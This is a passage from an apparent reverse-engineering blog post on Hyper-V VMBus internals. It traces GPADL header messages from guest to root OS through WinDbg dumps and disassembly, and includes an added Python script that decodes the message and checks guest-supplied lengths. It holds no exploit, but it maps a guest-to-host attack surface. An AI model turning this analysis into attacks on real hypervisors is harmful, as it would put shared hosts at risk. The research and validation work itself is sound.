<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICChild::ICServiceWork+0x137</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">icsvc!ICChild::ICServiceMain+0x8f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">svchost!ServiceStarter+0x358</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">sechost!ScSvcctrlThreadA+0x25</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KERNEL32!BaseThreadInitThunk+0xd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!RtlUserThreadStart+0x1d</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IoAllocateMdl is called with a buffer size of 0xC000. The result is the following MDL structure:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_MDL @rax (rax holds ffffe001`51d0d0d0)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Next : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Size : 0n144</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00a MdlFlags : 0n8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00c AllocationProcessorNumber : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00e Reserved : 0xffff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Process : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x018 MappedSystemVa : 0xffffe001`514e684c Void</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x020 StartVa : 0xffffd000`bb193000 Void</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x028 ByteCount : 0xc000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x02c ByteOffset : 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It then calls MmProbeAndLockPages, after which the PFN array entries are filled in directly behind the MDL header:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dq ffffe001`51d0d0d0 L20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d0d0 00000000`00000000 ffff0000`008a0090</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d0e0 00000000`00000000 ffffe001`514e684c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d0f0 ffffd000`bb193000 00000000`0000c000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d100 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5bb 00000000`0002d5bc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d110 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5bd 00000000`0002d5be</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d120 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5bf 00000000`0002d5c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d130 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5c1 00000000`0002d5c2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d140 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5c3 00000000`0002d5c4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`51d0d150 </span><span style="background-color: transparent; color: #002060; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0002d5c5 00000000`0002d5c6</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It then calls vmbus!ChCreateGpadlFromNtmdl (the MDL address is passed as the 2nd parameter), which in turn calls vmbus!ChpCreateGpaRanges with the MDL as its first parameter. That function copies the PFN entries from the MDL into a separate buffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="119" src="https://lh5.googleusercontent.com/HaFBKdYp8eLPsn4DqkM8nCqKGlQuNM5hEuMQv5dxhYEYmLj10uwsPcQzFCKg6wL7_29B7-jmq-aOk2cXzwEknRI5wGnyfclARq4xMOiIBtGtVykP5DFhcYewgAM6S9QL-WAQE41LzOo4obPz" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="437" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">which becomes the body of the CHANNELMSG_GPADL_HEADER message sent from the guest OS to the root OS via vmbus!ChSendMessage. The message can be seen in hv!HvPostMessage (hvix64.exe) or in winhv!WinHvPostMessage:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @rcx L30 (rcx is input parameter for hv!HvPostMessage)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96000 00000001 00030030 00000001 000000f0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96010 00000008 00000000 00000008 0000000f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96020 00010068 0000c000 00000000 0002d5bb</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96030 00000000 0002d5bc 00000000 0002d5bd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96040 00000000 0002d5be 00000000 0002d5bf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96050 00000000 0002d5c0 00000000 0002d5c1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96060 00000000 0002d5c2 00000000 0002d5c3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96070 00000000 0002d5c4 00000000 0002d5c5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000081`39c96080 00000000 0002d5c6 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The first 16 bytes are the common message header, where 0xF0 is the size of the message body. The VMBus packet is placed inside it; the VMBus packet header gives the packet type, 8 (CHANNELMSG_GPADL_HEADER), and rangecount is 1, which means that all the data was transmitted in a single packet. Next the root OS sends a CHANNELMSG_OPENCHANNEL_RESULT message, then the guest OS sends CHANNELMSG_OPENCHANNEL. After that, the root OS executes the work item</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChMapGpadlView</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmclr!KmclpServerOpenChannel</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmclr!KmclpWaitForActionWorkerRoutine</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopProcessWorkItem</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!ExpWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!PspSystemThreadStartup</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!KiStartSystemThread</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">during whose execution vmbusr!ChMapGpadlView is called. It in turn calls vmbusr!PkParseGpaRanges with a pointer to the part of the message that holds the buffer size 0xC000 and the PFNs carried in the CHANNELMSG_GPADL_HEADER message. Next come vmbusr!XPartLockChildPagesSynchronous -> vmbusr!XPartLockChildPages and then a function of the vid.sys driver (its name is unknown, since there are no symbols for this driver), which receives the PFN block passed in the message from the guest OS as its 2nd parameter </span></div>
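<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (not code from the original post), the following Python script decodes the CHANNELMSG_GPADL_HEADER message from the dd @rcx dump above and re-checks it the way a root-side parser such as vmbusr!PkParseGpaRanges has to, because every field in it comes from the guest: the declared range_buflen must fit inside the message, and the PFN array must cover the declared byte_count. The field layout is taken from the public vmbus_channel_gpadl_header and gpa_range definitions in the Linux Hyper-V drivers; the function names, the assumption that the 16-byte common header precedes the VMBus message, and the restriction to the single-message case (no CHANNELMSG_GPADL_BODY continuation) are mine. The script also recomputes the MDL size reported by dt nt!_MDL (0n144) from the buffer size, and runs the same range check over the beginning of the root-side dd poi(@rdx) block shown further down, reproduced here only up to 0x50 bytes so that the length check fires.</span></div>

```python
"""Added example: decode the CHANNELMSG_GPADL_HEADER captured in the WinDbg
dumps on this page and validate it the way a root-side parser must.

Field layout (from the public Linux Hyper-V driver definitions of
vmbus_channel_gpadl_header / gpa_range; all little-endian):
  u32 msgtype (8 = CHANNELMSG_GPADL_HEADER), u32 padding,
  u32 child_relid, u32 gpadl, u16 range_buflen, u16 rangecount,
  gpa_range[]: u32 byte_count, u32 byte_offset, u64 pfn_array[]
Assumption: single-message GPADL (no CHANNELMSG_GPADL_BODY continuation).
"""

PAGE_SIZE = 0x1000
CHANNELMSG_GPADL_HEADER = 8
HV_POST_MESSAGE_HEADER = 16   # the 16-byte common header before the VMBus message (assumed)
GPADL_FIXED_HEADER = 20       # bytes before the first gpa_range
SIZEOF_MDL = 0x30             # x64 MDL header; the PFN array follows it

# Constructed input: the `dd @rcx L30` dump from this page (first 0x90 bytes).
GUEST_DD_DUMP = """
00000081`39c96000 00000001 00030030 00000001 000000f0
00000081`39c96010 00000008 00000000 00000008 0000000f
00000081`39c96020 00010068 0000c000 00000000 0002d5bb
00000081`39c96030 00000000 0002d5bc 00000000 0002d5bd
00000081`39c96040 00000000 0002d5be 00000000 0002d5bf
00000081`39c96050 00000000 0002d5c0 00000000 0002d5c1
00000081`39c96060 00000000 0002d5c2 00000000 0002d5c3
00000081`39c96070 00000000 0002d5c4 00000000 0002d5c5
00000081`39c96080 00000000 0002d5c6 00000000 00000000
"""

# Constructed input: the root-side `dd poi(@rdx)` block from this page, i.e. the
# gpa_range handed to vid.sys, deliberately cut to its first 0x50 bytes here.
ROOT_DD_DUMP = """
ffffe001`ae827210 0000c000 00000000 0002d5bb 00000000
ffffe001`ae827220 0002d5bc 00000000 0002d5bd 00000000
ffffe001`ae827230 0002d5be 00000000 0002d5bf 00000000
ffffe001`ae827240 0002d5c0 00000000 0002d5c1 00000000
ffffe001`ae827250 0002d5c2 00000000 0002d5c3 00000000
"""


def dd_to_bytes(text):
    """Convert WinDbg `dd` output (address column + little-endian dwords) to bytes."""
    out = bytearray()
    for line in text.strip().splitlines():
        for word in line.split()[1:]:            # skip the address column
            out += int(word, 16).to_bytes(4, "little")
    return bytes(out)


def u(buf, off, size):
    """Read an unsigned little-endian integer of `size` bytes at `off`."""
    return int.from_bytes(buf[off:off + size], "little")


def span_pages(byte_offset, byte_count):
    """ADDRESS_AND_SIZE_TO_SPAN_PAGES: pages needed to cover the buffer."""
    return (byte_offset + byte_count + PAGE_SIZE - 1) // PAGE_SIZE


def expected_mdl_size(start_va, byte_count):
    """Size IoAllocateMdl reports: MDL header plus one 8-byte PFN per page."""
    return SIZEOF_MDL + 8 * span_pages(start_va & (PAGE_SIZE - 1), byte_count)


def parse_gpa_range(buf, off, end):
    """Parse one gpa_range in buf[off:end].  Every field is guest-controlled,
    so each is checked before use.  Returns (range_dict, next_offset)."""
    if end - off < 8:
        raise ValueError("truncated gpa_range header")
    byte_count, byte_offset = u(buf, off, 4), u(buf, off + 4, 4)
    off += 8
    if byte_count == 0 or byte_offset >= PAGE_SIZE:
        raise ValueError("bad byte_count/byte_offset")
    npages = span_pages(byte_offset, byte_count)
    if end - off < 8 * npages:
        raise ValueError(f"pfn_array short: need {npages} PFNs, have {(end - off) // 8}")
    pfns = [u(buf, off + 8 * i, 8) for i in range(npages)]
    return {"byte_count": byte_count, "byte_offset": byte_offset, "pfns": pfns}, off + 8 * npages


def parse_gpadl_header(msg):
    """Parse and validate a CHANNELMSG_GPADL_HEADER body."""
    if len(msg) < GPADL_FIXED_HEADER:
        raise ValueError("message shorter than fixed header")
    msgtype, child_relid, gpadl = u(msg, 0, 4), u(msg, 8, 4), u(msg, 12, 4)
    range_buflen, rangecount = u(msg, 16, 2), u(msg, 18, 2)
    if msgtype != CHANNELMSG_GPADL_HEADER:
        raise ValueError(f"unexpected msgtype {msgtype}")
    end = GPADL_FIXED_HEADER + range_buflen
    if rangecount == 0 or end > len(msg):
        raise ValueError("rangecount/range_buflen inconsistent with message length")
    ranges, off = [], GPADL_FIXED_HEADER
    for _ in range(rangecount):
        rng, off = parse_gpa_range(msg, off, end)
        ranges.append(rng)
    if off != end:
        raise ValueError("range_buflen does not match the ranges it describes")
    return {"child_relid": child_relid, "gpadl": gpadl, "ranges": ranges}


def decode_guest_message():
    """Strip the 16-byte common header, then parse the VMBus message."""
    return parse_gpadl_header(dd_to_bytes(GUEST_DD_DUMP)[HV_POST_MESSAGE_HEADER:])


def check_root_range():
    """Validate the root-side gpa_range block; returns the error text, or None
    if the block is complete."""
    raw = dd_to_bytes(ROOT_DD_DUMP)
    try:
        parse_gpa_range(raw, 0, len(raw))
    except ValueError as err:
        return str(err)
    return None


if __name__ == "__main__":
    msg = decode_guest_message()
    rng = msg["ranges"][0]
    print(f"gpadl={msg['gpadl']:#x} byte_count={rng['byte_count']:#x} "
          f"pfns={[hex(p) for p in rng['pfns']]}")
    print("expected MDL size:", expected_mdl_size(0xFFFFD000BB193000, 0xC000))  # 144
    print("root-side block:", check_root_range())
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run with python3. The guest message decodes to gpadl 0xf, byte_count 0xC000 and the twelve PFNs 0x2d5bb to 0x2d5c6, which is exactly what 0x68 bytes of range_buflen allows (8 bytes of gpa_range header plus 12 x 8 bytes of PFNs); the MDL size comes out as 144, matching Size : 0n144 in the dt nt!_MDL output; and the cut-down root-side block is rejected because it carries only 9 of the 12 PFNs its byte_count requires. The length checks are the interesting part: a root-side parser that trusted range_buflen or byte_count without them would read past the end of the guest-supplied buffer.</span></div>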
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>u @rip – the beginning of an unnamed function from vid.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Vid+0x18000:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218000 xor r11d,r11d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218003 mov r10,rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218006 cmp r9d,1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d21800a je Vid+0x1804a (fffff800`7d21804a)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d21800c lea eax,[r11+1]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218010 mov rcx,qword ptr [rsp+28h]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218015 mov dword ptr [rcx+2Ch],eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff800`7d218018 mov rax,qword ptr [rsp+38h]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd poi(@rdx)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827210 0000c000 00000000 0002d5bb 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827220 0002d5bc 00000000 0002d5bd 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe001`ae827230 0002d5be 00000000 0002d5bf 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
